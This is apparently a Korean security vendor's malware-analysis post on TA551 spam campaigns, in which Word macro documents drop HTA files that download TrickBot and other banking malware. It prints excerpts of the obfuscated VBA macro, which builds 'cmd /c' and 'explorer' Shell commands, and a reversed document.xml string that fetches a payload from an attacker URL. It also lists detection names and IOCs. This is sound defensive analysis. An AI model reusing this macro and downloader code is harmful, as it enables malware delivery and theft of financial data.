지속적으로 변형유포되는 악성 DOC 매크로 – TA551 동향

ASEC 분석팀에서는 악성 매크로 파일에 대해 지속적으로 소개하며 사용자들의 주의를 당부하고 있다. 최근 TA551 공격그룹에서 유포한 유형의 워드 매크로 파일에서 평균 일주일 간격의 변형이 발생하는 것이 확인되어 이를 소개하려 한다.

TA551 그룹은 악성코드 유포를 위해 악성 매크로가 포함된 문서를 첨부한 이메일을 주로 활용한다. 문서 매크로 허용 시 HTA 파일을 드롭한 후 추가 악성코드를 내려받는 DOC 파일 자체의 동작 방식은 동일하며, 변형의 주요 골자는 추가로 내려받는 악성코드의 종류에 있다.

그림 1) TA551 그룹에서 유포하는 악성DOC 매크로의 동작방식

위에서 도식화하여 표현한 악성 매크로 동작방식을 설명하면 다음과 같다.

공격자는 악성 DOC 파일이 첨부된 스팸메일을 유포하는데, 사용자가 메일 열람 과정에서 첨부파일을 다운로드 후 매크로를 실행하게 되면 악성 HTA 파일이 드롭된다. 해당 HTA 파일 내부에는 외부 URL에서 추가 악성코드를 다운로드 받을 수 있도록 하는 코드가 존재하며, 외부 URL의 링크가 유효할 경우 공격자가 의도한 최종적인 악성코드가 내려받아진 후 동작하게 된다.

그림 2) TrickBot 악성코드 유포에 사용한 DOC/HTA/DLL 파일명

이번에 TrickBot 악성코드를 유포하기 위해 사용한 악성 DOC 파일명과 드랍되는 HTA 파일명(DLL 파일명과 동일)은 위의 표에 정리하였다.

TrickBot 유포 목적의 변형 뿐만 아니라, TA551 그룹이 지속적으로 사용해 온 악성매크로 변형파일 유포 과정에서 확인되는 매크로 코드의 동작 방식은 크게 달라지지 않았다. 다만, TA551 에서 작년부터 꾸준히 유포해 온 악성 문서매크로 파일들에서 확인된 악성코드가 지속적으로 IcedId 류 였던 것에 반해, 내려받는 최종 악성코드의 종류가 조금씩 달라지고 있다는 것에 의미가 있다.

그림 3) DOC 매크로 허용 시 확인되는 행위 ( AhnLab RAPIT )

[document.xml] – 일부 발췌

eslaF ,"huDSHMPsgn=hcraes&xt6X4fLT=di&BPHSK=resu&sSW7qpNxMucIcoxFPTJ=jibxO&00oYo19C=hcraes&9vGttM=dic&64BBY6eIrpNf1DyB=XhF&hSlYk=resu?1uzam/NpGbPSg3Ddn55UEAB0gi62SxY3C48ybaZA/sFOKURIghF2uY7XcTM6FrDEGxffw/adda/moc.grebotcotseb//:ptth" ,"TEG" nepO.ptthlmx
2 ,"gpj.neercSnoitpac\atadmargorp\:c" eliFoTevaS.maerts

[매크로 코드] – 일부 발췌

Attribute VB_Name = "listboxArray"
Function templateCCurr(removeDocClass)
Debug.Print Shell("" + genericLnkResponse("explorer "))
End Function
Function genericLnkResponse(removeDocClass, Optional dateLibsW = "c:\progra", Optional btnLocal = "ta")
genericLnkResponse = removeDocClass & dateLibsW & "mdata\vbaQueryCount.h" & btnLocal
End Function
Function initTitle(arr As Variant)
Dim out As String
out = ""
For cnt = 1 To UBound(arr)
out = out & Chr(arr(cnt) Xor 100)
Next
initTitle = out
End Function
Attribute VB_Name = "captionO"
Function lnkObject(queryArray)
Shell singleLocal("cmd /c ")
End Function
Function singleLocal(queryArray, Optional listboxLng = "c:\\users\\public\\winSelBefore.h", Optional oOSize = "t", Optional optionDRef = "a")
singleLocal = queryArray & listboxLng & "" & oOSize & optionDRef
End Function
Function indexDocTmp(arr As Variant)
Dim out As String
out = vbNullChar
For cnt = 1 To UBound(arr)
out = out & Chr(arr(cnt) Xor 101)
Next
indexDocTmp = out
End Function

변형이 발생하는 버전마다 매크로코드 일부를 확인해보면, 1차 난독화 되어있는 document.xml 개체의 내부 데이터를 활용하여 2차 난독화 되어있는 hta를 생성하는 패턴으로 이어지는 것을 알 수 있다. 간단한 샘플을 확인해보면, hta 파일을 실행시키는 커맨드를 조합하는 과정을 조금 변형하거나 특정 유형에서는 위와 같이 단순하게 글자순서를 거꾸로 뒤집은 document.xml 내부의 데이터를 활용하기도 한다.

그림 4) 악성 DOC 매크로 파일
그림 5) 매크로 실행 후 드랍된 HTA 파일 일부
그림 6) HTA 일부 데이터에 대해 난독화 해제한 결과

최근에 유포된 샘플을 살펴보면, 그림 2와 같은 악성 매크로가 포함된 워드파일의 매크로를 허용 시 그림 5의 HTA 파일이 C:\Users\Public\ 경로에 드랍된다. HTA 파일 내부의 일부 코드를 난독화 해제하면 다음과 같이 외부의 악성 URL에서 추가 악성코드(winSelBefore.jpg)를 다운로드하여 C:\Users\Public 경로에 저장하도록 하는 코드가 확인된다. 여기서 내려받아지는 jpg 파일은 이미지 파일이 아니라 regsvr32.exe 로 실행되는 DLL 악성코드이다.
또한, 위에서 간단히 소개한 ‘[매크로코드]-일부 발췌’ 부분에서 알 수 있듯이 HTA 파일을 드랍하는 경로는 공격자가 의도한 매크로코드 변형에 따라 달라질 수 있다.

그림 7) jpg 확장자로 위장하여 내려받아진 TrickBot 악성코드
그림 8) TrickBot으로 동작하는 최종 dll 파일 ( AhnLab RAPIT)

최종적으로 내려받아진 악성코드는 TrickBot 이며, 사용자 PC에서 웹브라우저/금융거래 정보 등의 민감정보를 탈취하는 악성행위를 시도한다. AhnLab RAPIT(악성코드 자동분석 인프라)에서 제공하는 프로세스 트리(그림 8)에서도 알 수 있듯이, ipconfig.exe / net.exe / nltest.exe 등의 정상 프로세스를 통해 감염PC의 정보를 수집한다.

ASEC 분석팀에서는 아래와 같이 Trickbot 악성코드에 대해서도 블로그를 통해 소개해 온 바 있다.

최근의 변형 추이 확인 시 최종적으로 동작하는 악성코드가 달라진 것을 알 수 있었는데, 이들은 모두 금융정보 탈취형 악성코드로 확인된다.

  • IcedID 다운로드 유형
  • Ursnif 다운로드 유형
  • Trickbot 다운로드 유형

사용자들은 출처가 불분명한 메일의 첨부파일 실행을 자제하고, 만약 첨부파일을 다운로드 받았을 경우에는 매크로 실행(허용)을 지양해야한다. 문서 프로그램의 보안 설정이 낮은 경우에는 별도의 경고문구 없이 바로 매크로가 실행되기 때문에, 사용자는 보안 설정을 높음 수준으로 유지하여 의도치 않은 기능이 실행되지 않도록 주의가 필요하다.

또한, 사용하고 있는 안티바이러스 제품의 엔진 패턴 버전을 최신으로 업데이트하여 사용할 것을 권장한다.

안랩 V3 제품군에서는 본문에서 소개한 유형의 악성 파일들(DOC, HTA, DLL 등)에 대해 아래와 같이 진단하고 있다.

[파일 진단]
Downloader/DOC.TA551
Downloader/DOC.TA551.S1535
Downloader/DOC.Agent
Downloader/DOC.Generic
Dropper/MSOffice.Generic
Downloader/HTA.TA551
Downloader/Script.Agent
Trojan/JS.TrickBot
Trojan/Win.Generic.C4531900

[IOC]
47e580efca5c42565af7b214bd601d80
24d2245c3657caba1e3a3bbe14e0cc25
35ff8c7a28c72c64e0f5f9fc75e9a4aa
8333d57a044a01797f6e120b4c1b1dc2
97b1bb23455fb9a9607f37df266459fc
ebda58ce60415f80968457e8548b9fec
b736f5dc071bb3d2bb3f4f9e2e0155d1
86ddb37be7e54511c8761308c1d7fa91
2478032eded8e67228c05e8e1fdc7a89
hxxp://championriced[.]com
hxxp://app.bighomegl[.]at

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

5 2 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments